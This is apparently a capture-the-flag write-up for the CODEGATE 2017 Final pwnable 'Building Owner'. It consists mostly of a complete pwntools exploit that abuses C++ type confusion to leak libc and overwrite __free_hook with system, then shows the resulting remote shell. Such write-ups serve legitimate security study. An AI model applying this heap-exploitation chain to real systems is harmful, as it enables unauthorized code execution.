
CODEGATE 2017 FINAL - Building Owner

pwn3r_45 2017. 6. 4. 03:39

Category : Pwnables 


owner


Summary : type confusion, c++, free heap



Exploit

#!/usr/bin/python


from pwn import *

from struct import pack, unpack

def p(x):
    """Pack *x* as a little-endian unsigned 64-bit value (8 bytes)."""
    return pack("<Q", x)


def up(x):
    """Unpack the leading little-endian unsigned 64-bit value of *x*."""
    return unpack("<Q", x)[0]


# Challenge service endpoint as recorded in the writeup.
HOST = 'cykor.kr'
PORT = 7979


def create_apart(s, name, floor, house, desc):
    """Drive the service's "create apartment" dialogue on connection *s*.

    Selects menu item 1, then answers the prompts in the order the
    service asks them: *name*, *floor*, *house* (numbers are sent as
    decimal strings) and finally *desc*.
    """
    # (prompt to wait for, answer to send), in dialogue order.
    dialogue = [
        ('? \n', name),
        ('? ', str(floor)),
        ('? ', str(house)),
        (': ', desc),
    ]
    s.sendline('1')
    s.recvuntil('> ')
    for prompt, answer in dialogue:
        s.recvuntil(prompt)
        s.sendline(answer)



def m(s, menu):
    """Choose menu entry *menu* on connection *s* and wait for the next '> ' prompt."""
    choice = str(menu)
    s.sendline(choice)
    s.recvuntil('> ')



# Exploit sequence against the challenge service. The writeup's summary
# classifies the bug as type confusion in a C++ program over freed heap
# memory; the calls below only drive the service's menus, and the step
# comments are the author's.
# NOTE(review): this is a Python 2 script (print statement, str prompts
# passed to pwntools); it will not run unchanged on Python 3.
s = remote(HOST, PORT)
create_apart(s, 'pwn3r', 45, 45, 'pwn3r') # apart1
create_apart(s, 'pwn4r', 45, 45, 'pwn4r') # apart2
#create_apart(s, 'pwn5r', 45, 45, 'pwn5r') # apart3

m(s, 4) # manage
m(s, 2) # manage - change building
m(s, 1) # type - apartment
m(s, 1) # from apart1
m(s, 2) # to restaurant
m(s, 4) # back (now manage)

m(s, 1) # manage - edit
m(s, 1) # type - apartment
m(s, 1) # apart2
m(s, 1) # 1. name
s.recvuntil('Enter new name : ')
s.sendline('B'*0x70)
m(s, 5) # back (now edit)

# memory leak
m(s, 3)    # type - restaurant
m(s, 1)    # apart1
s.recvuntil('Normal price of menu : ')
leaked = int(s.recvline())
print hex(leaked) # the session transcript below shows 0x55c0908f8e50 here
main_arena_ptr = leaked - 0x90
m(s, 6) # 6. Normal price of menu
s.sendline(str(main_arena_ptr))
m(s, 9) # back (now edit)
m(s, 1) # type - apartment
m(s, 1) # apart2
s.recvuntil('Name : ')
# The first 8 bytes of the name are read back as a pointer; 88 is taken as
# its distance from main_arena (commonly the unsorted-bin head on 64-bit
# glibc) -- the value is assumed, not derived from the binary.
main_arena = up(s.recvline()[:8]) - 88
libc = ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
# NOTE(review): hard-coded offset used instead of the commented-out
# libc.symbols['main_arena'] lookup; it is tied to this exact libc-2.24 build.
libc_base = main_arena -0x3c1b00#libc.symbols['main_arena']

#libc.symbols['main_arena'] = main_arena
free_hook = libc_base +libc.symbols['__free_hook']
system_libc = libc_base + libc.symbols['system']
m(s, 5) # back (now edit)
m(s, 3) # type - restaurant
m(s, 1) # apart1
m(s, 6) # 6. Normal price of menu
s.sendline(str(free_hook))
m(s, 9) # back (now edit)
m(s, 1) # type - apartment
m(s, 1) # apart2
m(s, 1) # name edit
s.recvuntil('Enter new name : ')
s.sendline(p(system_libc))
m(s, 5) # back (now edit)
m(s, 3) # type - restaurant
m(s, 1) # apart1
m(s, 6) # 6. Normal price of menu
# '/bin/sh\x00' reinterpreted as a 64-bit integer, since the price prompt
# takes a number.
s.sendline(str(up('/bin/sh\x00')))
m(s, 9) # back (now edit)
m(s, 4) # back (now manage)
m(s, 4) # back (now home)
m(s, 5) # exit

s.interactive()


"""

pwn3r@cykor-ubuntu:~$ python owner_ex.py

[+] Opening connection to cykor.kr on port 7979: Done

0x55c0908f8e50

[*] '/lib/x86_64-linux-gnu/libc-2.24.so'

    Arch:     amd64-64-little

    RELRO:    Partial RELRO

    Stack:    Canary found

    NX:       NX enabled

    PIE:      PIE enabled

[*] Switching to interactive mode

$ id

uid=1011(pwn3r) gid=1011(pwn3r) groups=1011(pwn3r)

"""